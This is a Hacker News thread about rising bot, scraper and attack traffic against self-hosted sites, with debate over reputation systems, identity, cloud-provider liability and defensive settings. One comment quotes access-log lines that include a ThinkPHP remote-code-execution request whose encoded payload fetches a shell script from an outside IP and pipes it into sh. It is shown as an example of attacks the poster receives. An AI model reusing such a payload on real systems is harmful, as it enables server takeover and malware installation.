hngopher.com

       [HN Gopher] The internet is no longer a safe haven
       ___________________________________________________________________
        
       The internet is no longer a safe haven
        
       Author : akyuu
       Score  : 218 points
       Date   : 2025-11-16 13:12 UTC (9 hours ago)
        
 (HTM) web link (brainbaking.com)
 (TXT) w3m dump (brainbaking.com)
        
       | BinaryIgor wrote:
       | I wonder why is it that we get an increase in these automated
       | scrapers and attacks as of late (some few years); is there better
       | (open-source?) technology that allows it? Is it because hosting
       | infrastructure is cheaper also for the attackers? Both? Something
       | else?
       | 
       | Maybe the long-term solution for such attacks is to hide most of
       | the internet behind some kind of Proof of Work system/network, so
       | that mostly humans get to access to our websites, not machines.
        
         | trenchpilgrim wrote:
         | Using AI you can write a naive scraper in minutes and there's
         | now a market demand for cleaned up and structured data.
        
         | marginalia_nu wrote:
         | What's missing is effective international law enforcement. This
         | is a legal problem first and foremost. As long as it's as easy
         | as it is to get away with this stuff by just routing the
         | traffic through a Russian or Singaporean node, it's going to
         | keep happening. With international diplomacy going the way it
         | has been, odds of that changing aren't fantastic.
         | 
         | The web is really stuck between a rock and a hard place when it
         | comes to this. Proof of work helps website owners, but makes
         | life harder for all discovery tools and search engines.
         | 
         | An independent standard for request signing and building some
         | sort of reputation database for verified crawlers could be part
         | of a solution, though that causes problems with websites
         | feeding crawlers different content than users, an does nothing
         | to fix the Sybil attack problem.
        
           | luckylion wrote:
           | It's not necessarily going through a Russian or Singaporean
           | node though, on the sites I'm responsible for, AWS, GCP,
           | Azure are in the top 5 for attackers. It's just that they
           | don't care _at all_ about that happening.
           | 
           | I don't think you need world-wide law-enforcement, it'll be a
           | big step ahead if you make owners & operators liable. You can
           | limit exposure so nobody gets absolutely ruined, but anyone
           | running wordpress 4.2 and getting their VPS abused for
           | attacks currently has 0 incentive to change anything unless
           | their website goes down. Give them a penalty of a few hundred
           | dollars and suddenly they do. To keep things simple, collect
           | from the hosters, they can then charge their customers, and
           | suddenly they'll be interested in it as well, because they
           | don't want to deal with that.
           | 
           | The criminals are not held liable, and neither are their
           | enablers. There's very little chance anything will change
           | that way.
        
             | mrweasel wrote:
             | The big cloud provides needs to step up and take
             | responsibility. I understand that it can't be to easy to
             | do, but we really do need a way to contact e.g. AWS and
             | tell them to shut of a costumer. I have no problem with
             | someone scraping our websites, but I care that they don't
             | do so responsibly, slow down when we start responding
             | slower, don't assume that you can just go full throttle,
             | crash our site, wait, and then do it again once we start
             | responding again.
             | 
             | You're absolutely right: AWS, GCP, Azure and others, they
             | do not care and especially AWS and GCP are massive
             | enablers.
        
               | ctoth wrote:
               | > we really do need a way to contact e.g. AWS and tell
               | them to shut of a costumer.
               | 
               | You realize you just described the infrastructure for far
               | worse abuse than a misconfigured scraper, right?
        
               | mrweasel wrote:
               | I'm very aware of that, yes. There needs to be a good
               | process, the current situation where AWS simply does not
               | care, or doesn't know also isn't particularly good. One
               | solution could be for victims to notify AWS that a number
               | of specified IP are generating an excessive amount of
               | traffic. An operator could then verify with AWS traffic
               | logs, notify the customer that they are causing issue and
               | only after a failure to respond could the customer be
               | shut down.
               | 
               | You're not wrong that abuse would be a massive issue, but
               | I'm on the other side of this and need Amazon to do
               | something, anything.
        
           | Aurornis wrote:
           | > What's missing is effective international law enforcement.
           | 
           | International law enforcement on the Internet would also
           | subject you to the laws of other countries. It goes both
           | ways.
           | 
           | Having to comply with all of the speech laws and restrictions
           | in other countries is not actually something you want.
        
             | ocdtrekkie wrote:
             | This is already kind of true with every global website, the
             | idea of a single global internet is one of those fairy tale
             | fantasy things, that maybe happened for a little bit before
             | enough people used it. In many cases it isn't really ideal
             | today.
        
             | marginalia_nu wrote:
             | We have historically solved this via treaties.
             | 
             | If you want to trade with me, a country that exports
             | software, let's agree to both criminalize software piracy.
             | 
             | No reason why this can't be extended to DDoS attacks.
        
               | beeflet wrote:
               | I don't want governments to have this level of control
               | over the internet. It seems like you are paving over a
               | technological problem with the way the internet is
               | designed by giving some institution a ton of power over
               | the internet.
        
               | marginalia_nu wrote:
               | The alternative to governments stopping misbehavior is
               | every website hiding behind Cloudflare or a small number
               | of competitors, which is a situation that is far more
               | susceptible to abuse than having a law that says you
               | can't DDoS people even if you live in Singapore.
               | 
               | It really can not be overstated how unsustainable the
               | status quo is.
        
           | armchairhacker wrote:
           | I don't think this can solved legally without compromising
           | anonymity. You can block unrecognized clients and punish the
           | owners of clients that behave badly, but then, for example,
           | an oppressive government can (physically) take over a
           | subversive website and punish everyone who accesses it.
           | 
           | Maybe pseudo-anonymity and "punishment" via reputation could
           | work. Then an oppressive government with access to a
           | subversive website (ignoring bad security, coordination with
           | other hijacked sites, etc.) can only poison its clients'
           | reputations, and (if reputation is tied to sites, who have
           | their own reputations) only temporarily.
        
             | ajuc wrote:
             | > but then, for example, an oppressive government can
             | (physically) take over a subversive website and punish
             | everyone who accesses it.
             | 
             | Already happens. Oppressive governments already punish
             | people for visiting "wrong" websites. They already censor
             | internet.
             | 
             | There are no technological solutions to coordination
             | problems. Ultimately, no matter what you invent, it's
             | politics that will decide how it's used and by whom.
        
           | BinaryIgor wrote:
           | Good points; I would definitely vouch for an independent
           | standard for request signing + some kind of decentralized
           | reputation system. With international law enforcement, I
           | think there could be too many political issues for it not
           | become corrupt
        
         | rkagerer wrote:
         | _long-term solution_
         | 
         | How about a reputation system?
         | 
         | Attached to IP address is easiest to grok, but wouldn't work
         | well since addresses lack affinity. OK, so we introduce an
         | identifier that's persistent, and maybe a user can even port it
         | between devices. Now it's bad for privacy. How about a way a
         | client could prove their reputation is above some threshold
         | without leaking any identifying information? And a
         | decentralized way for the rest of the internet to influence
         | their reputation (like when my server feels you're hammering
         | it)?
         | 
         | Do anti-DDoS intermediaries like Cloudflare basically catalog a
         | spectrum of reputation at the ASN level (pushing anti-abuse
         | onus to ISP's)?
         | 
         | This is basically what happened to email/SMTP, for better or
         | worse :-S.
        
           | JimDabell wrote:
           | Reputation plus privacy is probably unsolvable; the whole
           | point of reputation is knowing what people are doing
           | elsewhere. You don't need reputation, you need persistence.
           | You don't need to know if they are behaving themselves
           | elsewhere on the Internet as long as you can ban them once
           | and not have them come back.
           | 
           | Services need the ability to obtain an identifier that:
           | 
           | - Belongs to exactly one real person.
           | 
           | - That a person cannot own more than one of.
           | 
           | - That is unique per-service.
           | 
           | - That cannot be tied to a real-world identity.
           | 
           | - That can be used by the person to optionally disclose
           | attributes like whether they are an adult or not.
           | 
           | Services generally don't care about knowing your exact
           | identity but being able to ban a person and not have them
           | simply register a new account, and being able to stop people
           | from registering thousands of accounts would go a long way
           | towards wiping out inauthentic and abusive behaviour.
           | 
           | The ability to "reset" your identity is the underlying hole
           | that enables a vast amount of abuse. It's possible to have
           | persistent, pseudonymous access to the Internet without
           | disclosing real-world identity. Being able to permanently ban
           | abusers from a service would have a hugely positive effect on
           | the Internet.
        
             | jasonjayr wrote:
             | A digital "Death penalty" is not a win for society, without
             | considering a fair way to atone for "crimes against your
             | digital identity".
             | 
             | It would be way to easy for the current regime (whomever
             | that happens to be) to criminalize random behaviors (Trans
             | People? Atheists? Random nationality?) to ban their
             | identity, and then they can't apply for jobs, get bus fare,
             | purchase anything online, communicate with their lawyers,
             | etc.
        
               | JimDabell wrote:
               | Describing _"I don't want to provide service to you and I
               | should have the means of doing so"_ as a _"digital death
               | penalty"_ is a tad hyperbolic, don't you think?
               | 
               | > It would be way to easy for the current regime
               | (whomever that happens to be) to criminalize random
               | behaviors (Trans People? Atheists? Random nationality?)
               | to ban their identity, and then they can't apply for
               | jobs, get bus fare, purchase anything online, communicate
               | with their lawyers, etc.
               | 
               | Authoritarian regimes can already do that.
               | 
               | I think perhaps you might've missed the fact that what I
               | was suggesting was individual to each service:
               | 
               | > Reputation plus privacy is probably unsolvable; the
               | whole point of reputation is knowing what people are
               | doing elsewhere. You don't need reputation, you need
               | persistence. You don't need to know if they are behaving
               | themselves elsewhere on the Internet as long as you can
               | ban them once and not have them come back.
               | 
               | I was saying _don't_ care about what people are doing
               | elsewhere on the Internet. Just ban locally - but
               | persistently.
        
             | hombre_fatal wrote:
             | If creating an identity has a cost, then why not allow
             | people to own multiple identities? Might help on the
             | privacy front and address the permadeath issue.
             | 
             | Of course everything sounds plausible when speaking at such
             | a high level.
        
               | rkagerer wrote:
               | I agree and think the ability to spin up new identities
               | is crucial to any sort of successful reputation system
               | (and reflects the realities of how both good and bad
               | actors would use it). Think back to early internet when
               | you wanted an identity in one community (e.g. forums
               | about games you play) that was separate from another
               | (e.g. banking). But it means those reputation identities
               | need to take some investment (e.g. of time / contribution
               | / whatever) to build, and can't become usefully trusted
               | until reaching some threshold.
        
               | nucleardog wrote:
               | Yep, this is basically how I'd implement it if I needed
               | to. Just tackle the problem in reverse here: Don't assume
               | users are good and try and track which are bad, assume
               | users are bad and track which are good.
               | 
               | Look at the HN karma system--you start with limited
               | features, and as you show yourself a good user, you get
               | more features (and also trust/standing with the
               | community). "Resetting" your identity only ever loses you
               | something.
               | 
               | Apply the same thing to a git host getting hammered or
               | something--by default, users can't view the history
               | online or something (can still clone), but as your
               | identity establishes reputation (through positive
               | interactions, or even just browsing in a non-bot-like
               | manner), your reputation increases and you get rate-
               | limited access or something.
               | 
               | This is essentially where a lot of spam ended up--it used
               | to be that your mail was deliverable until you acted
               | poorly, then your reputation was bad and your
               | deliverability went down. Now it more closely resembles
               | this--your reputation is bad until you send enough good
               | mail and take enough good actions (DKIM/SPF, etc) to show
               | yourself as good.
               | 
               | The issues really all stems from "resetting your identity
               | gets you back in good standing". Once you take that out
               | of the mix, you no longer need to worry much about
               | limiting identities, tying them to the real world,
               | ensuring they're persistent, or many of the other hard
               | problems that come up.
        
               | TylerE wrote:
               | Because of course what this world needs is for the
               | wealthy to have even more advantages over the normies.
               | (Hint: If you're reading this, and think you're one of
               | the wealthy ones, you aren't)
        
             | lifty wrote:
             | Zero knowledge proof constructs have the potential to solve
             | these kind of privacy/reputation tradeoffs.
        
           | gmuslera wrote:
           | It's ironic to use reputation system for this.
           | 
           | 20+ years ago there were mail blacklists that basically
           | blocked residential IP blocks as there should not be servers
           | trying to send normal mail from there. Now you must try the
           | opposite, blacklist blocks where only servers and not end
           | users can come from, as there is potentially bad behaved
           | scrapers in all major clouds and server hosting platforms.
           | 
           | But then there are residential proxies that pay end users to
           | route requests from misbehaved companies, so that door is
           | also a bad mitigation
        
             | rkagerer wrote:
             | It's interesting that along another axis, the inertia of
             | the internet moved from a decentralized structure back
             | toward something that resembles mainframes. I don't think
             | those axes are orthogonal.
        
         | hnthrowaway0315 wrote:
         | I guess it is just because 1) They can, and 2) Everyone wants
         | some data. I think it would be interesting if every website out
         | there starts to push out BS pages just for scrappers. Not sure
         | how much extra cost it's going to take if a website puts up say
         | 50% BS pages that only scrappers can reach, or BS material with
         | extremely small fonts hidden in regular pages that ordinary
         | people cannot see.
        
           | inerte wrote:
           | Something like https://blog.cloudflare.com/ai-labyrinth/ ?
        
         | Vegenoid wrote:
         | I'm pretty sure it is the commercial demand for data from AI
         | companies. It is certainly the popular conception among
         | sysadmins that it is AI companies who are responsible for the
         | wave of scrapers over the past few years, and I see no
         | compelling alternative.
        
           | embedding-shape wrote:
           | > and I see no compelling alternative.
           | 
           | Another potential cause: It's way easier for pretty much any
           | person connected to the internet to "create" their own
           | automation software by using LLMs. I could wager even the
           | less smart LLMs could handle "Create a program that checks
           | this website every second for any product updates on all
           | pages" and give enough instructions for the average computer
           | user to be able to run it without thinking or considering
           | much.
           | 
           | Multiply this by every person with access to an LLM who wants
           | to "do X with website Y" and you'll get an magnitude increase
           | in traffic across the internet. This been possible since
           | what, 2023 sometime? Not sure if the patterns would line up,
           | but just another guess for the cause(s).
        
         | EGreg wrote:
         | Why? It's because of AI. It enables attacks at scale. It
         | enables more people to attack, who previously couldn't. And so
         | on.
         | 
         | It's very explainable. And somehow, like clockwork, there are
         | always comments to say "there is nothing new, the Internet has
         | always been like this since the 80s".
         | 
         | You know, part of me wants to see AI proliferate into more and
         | more areas, just so these people will finally wake up
         | eventually and understand there is a huge difference when AI
         | does it. When they are relentlessly bombarded with realistic
         | phone calls from random numbers, with friends and family
         | members calling about the latest hoax and deepfake, when their
         | own specific reputation is constantly attacked and destroyed by
         | 1000 cuts not just online but in their own trusted circles, and
         | they have to put out fires and play whack-a-mole with an
         | advanced persistent threat that only grows larger and always
         | comes from new sources, anonymous and not.
         | 
         | And this is all before bot swarms that can coordinate and plan
         | long-term, targeting specific communities and individuals.
         | 
         | And this is all before humanoid robots and drones proliferate.
         | 
         | Just try to fast-forward to when human communities online and
         | offline are constantly infiltrated by bots and drones and
         | sleeper agents, playing nice for a long time and amassing karma
         | / reputation / connections / trust / whatever until finally
         | doing a coordinated attack.
         | 
         | Honestly, people just don't seem to get it until it's too late.
         | Same with ecosystem destruction -- tons of people keep
         | strawmanning it as mere temperature shifts, even while
         | ecosystems around the world get destroyed. Kelp forests.
         | Rainforests. Coral reefs. Fish. Insects. And they're like "haha
         | global warming by 3 degrees big deal. Temperature has always
         | changed on the planet." (Sound familiar?)
         | 
         | Look, I don't actually want any of this to happen. But if they
         | could somehow experience the movie _It's a Wonderful Life_ or
         | meet the _Ghost of Christmas Yet to Come_ , I'd wholeheartedly
         | want every denier to have that experience. (In fact, a
         | dedicated attacker can already give them a taste of this with
         | current technology. I am sure it will become a decentralized
         | service soon :-( )
        
           | hshdhdhj4444 wrote:
           | Our tech overlords understand AI, especially any form of AGI,
           | will basically be the end of humanity. That's why they're
           | entirely focused on being the first and amassing as much
           | wealth in the meanwhile, giving up on any sort of
           | consideration whether they're doing good for people or not.
        
       | jchw wrote:
       | Anubis is definitely playing the cat-and-mouse game to some
       | extent, but I like what it does because it forces bots to either
       | identify themselves as such or face challenges.
       | 
       | That said, we can likely do better. Cloudflare does good in part
       | because Cloudflare runs so much traffic, so they have a lot of
       | data across the internet. Smaller operators just don't get enough
       | traffic to really deal with banning abusive IPs without banning
       | entire ranges indefinitely, not ideal. I hope to see a solution
       | like Crowdsec where reputation data can be crowdsourced to block
       | known bad bots (at least for a while since they are likely
       | borrowing IPs) while using low complexity (potentially JS-free)
       | challenges for IPs with no bad reputation. It's probably too much
       | to ask for Anubis upstream which is probably already too busy
       | dealing with the challenges of what it already does at the scale
       | it is operating, but it does leave some room for further
       | innovation for whoever wants to go for it.
       | 
       | In my opinion there is at least no reason why it is not plausible
       | to have a drop-in solution that can mostly resolve these problems
       | and make it easier for hobbyists to run services again.
        
       | gjsman-1000 wrote:
       | The problem with anything, _anything_ , without a centralized
       | authority, is that friction overwhelms inertia. Bad actors exist
       | and have no mercy, while good people downplay them until it's too
       | late. Entropy always wins. Misguided people assume the problem is
       | _powerful people,_ when the problem is actually what the
       | _powerful people use their authority to do_ , as powerful people
       | will always exist. Accepting that and maintaining oversight is
       | the historically successful norm; abolishing them has always
       | failed.
       | 
       | As such, I don't identify with the author of this post, about
       | trying to resist CloudFlare for moral reasons. A decentralized
       | system where everyone plays nice and mostly cooperates, does not
       | exist any more than a country without a government where everyone
       | plays nice and mostly cooperates. It's wishful thinking. We
       | already tried this with Email, and we're back to gatekeepers.
       | Pretending the web will be different is ahistorical.
        
         | pixl97 wrote:
         | The internet has made the world small and that's a problem.
         | Nation states typically had a limited range of broadcasting
         | their authority in the more distant past. A bad ruler couldn't
         | rule the entire world, nor could they cause trouble with the
         | entire world. From nukes to the interconnected web the worst of
         | us with power can effect everyone else.
        
         | martin-t wrote:
         | Power is a spectrum. Power differentials will always exist but
         | we can absolutely strive to make them smaller and smaller.
         | 
         | 1) Most of the civilized world no longer has hereditary
         | dictators (such as "kings"). Because they were removed from
         | power by the people and the power was distributed among many
         | individuals. It works because malicious (anti-social)
         | individuals have trouble working together. And yes, oversight
         | helps.
         | 
         | But it's a spectrum and we absolutely can and should move the
         | needle towards more oversight and more power distribution.
         | 
         | 2) Corporate power structures are still authoritarian. We can
         | change that too.
        
       | time4tea wrote:
       | Had to ban RU, CN, SG, and KR just cos of the volume of spam. The
       | random referer headers has recently become a problem.
       | 
       | This is particularly annoying as knowing where people come from
       | is important.
       | 
       | Its just another reason to give up making stuff, and give in to
       | the FAANG and the AI enshittification.
       | 
       | :-(
        
         | mrweasel wrote:
         | If you only care about regular users I'd advice banning all
         | known datacenters, Browserbase, China and Brazil.
        
           | worthless-trash wrote:
           | I also banned the middle east, Logs actually reflected real
           | users, cost dropped, and my mental health improved.
           | 
           | Win Win.
        
             | mrweasel wrote:
             | If you know that you don't have customers or users in the
             | area, or very few, then go for it.
             | 
             | I worked in e-commerce previously, we reduce fraud to
             | almost zero by banning non-local cards. It affected a few
             | customers that had international credit cards, but not
             | enough to justify dealing with the fraud. Sometimes you
             | just need to limit your attack surface.
        
       | mberning wrote:
       | the internet is over. If we want to recapture the magic of the
       | earlier times we are going to have to invent something new.
        
         | fithisux wrote:
         | going back to Gopher?
        
           | itintheory wrote:
           | Gopher still requires the Internet. I know it's pretty common
           | to conflate "the Internet" with "the World Wide Web", but
           | there are actually other protocols out there (like Gopher).
        
             | fithisux wrote:
             | I don't see a solution then.
        
           | groundzeros2015 wrote:
           | Why would that help?
        
         | pixl97 wrote:
         | There is no something new. Anything we invent will be able to
         | be taken over by complex bots. Welcome to the futureshock where
         | humans aren't at the top of their domain.
        
         | 9rx wrote:
         | The magical times in the past have always been marked with
         | being able to be part of an "exclusive club" that takes
         | something from nothing to changing the world.
         | 
         | Because of the internet, magical times can never be had again.
         | You can invent something new, but as soon as anyone finds out
         | about it, everyone now finds out about it. The "exclusive club"
         | period is no more.
        
           | martin-t wrote:
           | > magical times can never be had again
           | 
           | Yes, they can. But we need to admit to ourselves that people
           | are not equal. Not just in terms of skill but in terms of
           | morality and quality of character. And that some people are
           | best kept out.
           | 
           | Corporations, being amoral, should also be kept out.
           | 
           | ---
           | 
           | The old internet was the way it was because of gate keeping -
           | the people on it were selected through technical skill being
           | required. Generally people who are builder types are more
           | pro-social than redistributor types.
           | 
           | Any time I've been in a community which felt good, it was
           | full of people who enjoyed building stuff.
           | 
           | Any time such a community died, it was because people who
           | crave power and status took it over.
        
             | dw_arthur wrote:
             | Gatekeeping and exclusion are going to have to make a
             | comeback if we want to have a thriving culture again.
             | Sometimes people need to be told their art, taste, or
             | morals are lacking.
        
         | willis936 wrote:
         | Third spaces and the free time to explore them?
         | 
         | No no, that doesn't maximize shareholder value.
        
         | renewiltord wrote:
         | Haha, you could host on Gemini instead of HTTP. You'd simulate
         | the old internet in that only enthusiasts would come!
        
         | basscomm wrote:
         | There's already an Interet2; do we need to invent Internet3?
        
       | bpt3 wrote:
       | The internet hasn't been a safe haven since the 80s, or maybe
       | earlier (that was before my time, and it's never been one since I
       | got online in the early 90s).
       | 
       | The only real solution is to implement some sort of identity
       | management system, but that has so many issues that make it a
       | non-starter.
        
         | lotsofpulp wrote:
         | > The only real solution is to implement some sort of identity
         | management system, but that has so many issues that make it a
         | non-starter.
         | 
         | Apple and Alphabet seem positioned to easily enable it.
         | 
         | https://www.apple.com/newsroom/2025/11/apple-introduces-digi...
        
           | JSR_FDED wrote:
           | I don't get it. That link refers to Apple letting you put
           | your passport and drivers license info in the wallet on your
           | phone.
        
             | Astronaut3315 wrote:
             | Apple's Wallet app presents this feature as being for "age
             | and identity verification in apps, online and in person".
        
           | pixl97 wrote:
           | Alphabet the company that bans people for opaque reasons with
           | no recourse, good idea. Maybe tech should not be in charge of
           | digital identification
        
             | lotsofpulp wrote:
             | The governments like it that way. They want banks and tech
             | companies to be intermediaries that are more difficult to
             | hold accountable, because they can just say "we didn't feel
             | like doing business with this person".
        
         | cosmicgadget wrote:
         | Was it a safe haven or was it less safe but simply an
         | unprofitable target?
        
         | unreal37 wrote:
         | Given that the World Wide Web was invented in 1989... are you
         | saying that the Internet was safer when only FTP and Usenet
         | existed?
        
       | qwertox wrote:
       | Since I moved my DNS records to Cloudflare (that is: nameserver
       | is now the one from Cloudflare), I get tons of odd connections,
       | most notably SYN packets to eihter 443 or 22, which never respond
       | back after the SYN-ACK. They ping me once a second in average,
       | distributing the IPs over a /24 network.
       | 
       | I really don't understand why they do this, and it's mostly some
       | shady origins, like vps game server hoster from Brazil and so on.
       | 
       | I'm at the point where i capture all the traffic and looks for
       | SYN packets, check the RDAP records for them to decide if I then
       | drop the entire subnets of that organization, whitelisting things
       | like Google.
       | 
       | Digital Ocean is notoriously a source of bad traffic, they just
       | don't care at all.
        
         | kzemek wrote:
         | These are spoofed packets for SYNACK reflection attacks. Your
         | response traffic goes to the victim, and since network stacks
         | are usually configured to retry SYNACK a few times, they also
         | get amplification out of it
        
         | sva_ wrote:
         | > like vps game server hoster from Brazil and so on.
         | 
         | Probably someone DDoSing a Minecraft server or something.
         | 
         | People in games do this where they DDoS each other. You can get
         | access to a DDoS panel for as little as $5 a month.
         | 
         | Some providers allow for spoofing the src ip, that's how they
         | do these reflection attacks. So you're not actually dropping
         | the sender of these packets, but the victims.
         | 
         | Consider turning reverse path filter to strict as a basic anti
         | spoofing method and see if it helps
         | net.ipv4.conf.all.rp_filter = 1
         | net.ipv4.conf.default.rp_filter = 1
        
           | qwertox wrote:
           | Thanks, it never came to my mind.
        
           | cute_boi wrote:
           | I believe kernel should make this behavior as default.
        
         | ranger_danger wrote:
         | > Digital Ocean is notoriously a source of bad traffic, they
         | just don't care at all.
         | 
         | Why should it be an ISP's job to police what their users can
         | and can't do? I _really_ don 't think you want service
         | providers to start moderating things.
         | 
         | Does your electricity company ban the use of red light bulbs?
         | Would everyone be ok with such restrictions?
        
           | selectodude wrote:
           | No but your electricity company will absolutely rat you out
           | if your electricity usage skyrockets and the police will pop
           | by to see if you're running a grow op or something.
        
             | esseph wrote:
             | Not anymore (depending on the state, and not since LED grow
             | lights).
        
       | threeducks wrote:
       | > Fail2ban was struggling to keep up: it ingests the Nginx
       | access.log file to apply its rules but if the files keep on
       | exploding...         > [...]         > But I don't want to fiddle
       | with even more moving components and configuration
       | 
       | You can configure nginx to do rate-limiting directly. Blog post
       | with more details: https://blog.nginx.org/blog/rate-limiting-
       | nginx
        
       | embedding-shape wrote:
       | > The internet is no longer a safe haven for software hobbyists
       | 
       | Maybe I've just had bad luck, but since I started hosting my own
       | websites back around 2005 or so, my servers have always been
       | attacked basically from the moment they come online. Even more so
       | when you attach any sort of DNS name to it, especially when you
       | use TLS and the certificates, guessing because they end up in a
       | big index that is easily accessible (the "transparency logs").
       | Once you start sharing your website, it again triggers an
       | avalanche of bad traffic, and the final boss is when you piss of
       | some organization and (I'm assuming) they hire some bad actor to
       | try to make you offline.
       | 
       | Dealing with crawlers, bot nets, automation gone wrong, pissed of
       | humans and so on have been almost a yearly thing for me since I
       | started deploying stuff to the public internet. But again, maybe
       | I've had bad luck? Hosted stuff across wide range of providers,
       | and seems to happen across all of them.
        
         | zwnow wrote:
         | My first ever deployed project was breached on day 1 with my
         | database dropped and a ransom note in there. Was a beginner
         | mistake by me that allowed this, but it's pretty discouraging.
         | Its not the internet that sucks, its people that suck.
        
           | mattmaroon wrote:
           | Well I guess at least on day 1 you didn't have much to lose!
        
             | zwnow wrote:
             | Its a personal blog so even if data was lost it would've
             | been just posts that nobody reads. Certainly not worth the
             | 0.00054 BTC they wanted
        
             | timeinput wrote:
             | more like a zero day on day zero.
        
         | aftbit wrote:
         | My stuff used to get popped daily. A janky PHP guestbook I
         | wrote just to learn back in the early 2000s? No HTML injection
         | protection & someone turned my site into spammy XSS hack within
         | days. A WordPress installation I fell behind on patching?
         | Turned into SEO spam in hours. A redis instance I was using
         | just to learn some of their data structures that got
         | accidentally exposed to the web? Used to root my computer and
         | install a botnet RAT. This was all before 2020.
         | 
         | I never felt this made the internet "unsafe". Instead, it just
         | reminded me how I messed up. Every time, I learned how to do
         | better, and I added more guardrails. I haven't gotten popped
         | that obviously in a long time, but that's probably because I've
         | acted to minimize my public surface area, used star-certs to
         | avoid being in the cert logs, added basic auth whenever I can,
         | and generally refused to _trust_ software that's exposed to the
         | web. It's not unsafe if you take precautions, have backups, and
         | are careful about what you install.
         | 
         | If you want to see unsafe, look at how someone who doesn't
         | understand tech tries to interact with it. Downloading any
         | random driver or exe to fix a problem, installing apps when a
         | website would do, giving Facebook or Tiktok all of their
         | information and access without recognizing that just maybe
         | these multi-billion-dollar companies who give away all of their
         | services don't have your best interests in mind.
        
           | BolexNOLA wrote:
           | I really like how you take these situations and turn them
           | into learning moments, but ultimately what you're describing
           | still sounds like an incredibly hostile space. Like yeah
           | everyone should be a defensive driver on the road, but we
           | still acknowledge that other people need to follow the rules
           | instead of forcing us to be defensive drivers all the time.
        
           | zelphirkalt wrote:
           | Hosting a WP with any amount of by script kiddies written
           | third-party plugins without constant vigilance and keeping
           | things up to date is a recipe for disaster. This makes it a
           | job guarantee. Hapless people paying for someone to set up a
           | hopelessly over-complicated WP setup, paying for lots of
           | plugins, and constant upkeep. Basically, that ecosystem feeds
           | an entire community of "web developers" by pushing badly
           | written software, that then endlessly needs to be patched and
           | maintained. Then the feature creep sets in and plugins stray
           | from the path of doing one thing well, until even WP instance
           | maintainers deem them too bloated and look for a simpler one.
           | Then the cycle begins anew.
        
           | fragmede wrote:
           | The worst feeling I ever had was from exposing a samba share
           | to the Internet in the 2000s and having that get popped and
           | my dad's company getting hacked because of the service I set
           | up for him.
        
         | heresie-dabord wrote:
         | > my servers have always been attacked
         | 
         | I believe the correct verb is _monetised_.
        
         | BinaryIgor wrote:
         | I have very similar experience. In my Nginx logs, I see things
         | like that on a regular basis:
         | 
         | 79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET
         | /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555
         | "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm"
         | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
         | (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ...
         | 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00
         | \xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x
         | 8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \x
         | D0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x
         | 88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-"
         | 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00
         | \xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x
         | 13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE
         | \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\
         | x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"
         | 
         | or:
         | 
         | "192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/in
         | dex.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_
         | user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%
         | 3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-
         | %20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20h
         | ttp%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301
         | 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"
         | 
         | These are just some examples, but they happen pretty much daily
         | :(
        
         | hdgvhicv wrote:
         | I remember watching the code red signatures in my space logs on
         | my desktop back in 2001
        
         | NoboruWataya wrote:
         | I have a personal domain that I have no reason to believe any
         | other human visits. I selfhost a few services that only I use
         | but that I expose to the internet so I can access them from
         | anywhere conveniently and without having to expose my home
         | network. Still I get a constant torrent of malicious traffic,
         | just bots trying to exploit known vulnerabilities (loads of
         | them are clearly targeting WordPress, for example, even though
         | I have never used WordPress). And it has been that way for
         | years. I remember the first time I read my access logs I had a
         | heart attack, but it's just the way it is.
        
           | timeinput wrote:
           | and it has been that way for a long time. Hosting a service
           | on the internet means some one is *constantly* knocking at
           | your door. It would be unimaginable if every few 10-1000s of
           | milliseconds someone was trying a key in my front door, but
           | that's just what it is with an open port on the internet.
        
             | sshine wrote:
             | I recently provisioned a VPS for educational purposes. As
             | part of teaching public/private network interfaces in
             | Docker, and as a debug tool, I run netstat pretty easily
             | on.
             | 
             | Minutes after coming into existence, I have half a dozen
             | connections to sshd from Chinese IP addresses.
             | 
             | That teaches the use of SSH keys.
        
               | toyg wrote:
               | Just put sshd on a nonstandard port, and 95% of the
               | traffic goes away. Vandals can't be bothered with port-
               | scanning, probably because the risk of getting banned
               | before the scan is even complete is too high.
               | 
               | But I agree that keys are not optional anymore.
        
               | esseph wrote:
               | Fronting with ssh is not as secure as you could be.
               | 
               | Wireguard, tailscale, etc instead, THEN use ssh keys
               | (with password on them mind you, then you have 2fa -
               | something you have, and something you know).
        
           | mbreese wrote:
           | I've often thought about writing a script to use those bot
           | attacks as a bit of a honey pot. The idea would be if someone
           | is viewing a site with a brand new SSL certificate, that it
           | can't be legitimate traffic, so just block that ip/subnet
           | outright at the firewall. Especially if they are looking for
           | specific URLs like Wordpress installations. There are a few
           | good actors that also hit sites quickly (ex: I've seen Bing
           | indexing in that first wave of hits), but those are the
           | exception.
           | 
           | Sadly, like many people, I just deal with the traffic as
           | opposed to getting around to actually writing a tool to block
           | it.
        
             | esseph wrote:
             | You'd end up blocking a bunch of cloud provider IP ranges
             | and one day in the near future, there's a good chance some
             | SaaS or provider service doesn't work.
        
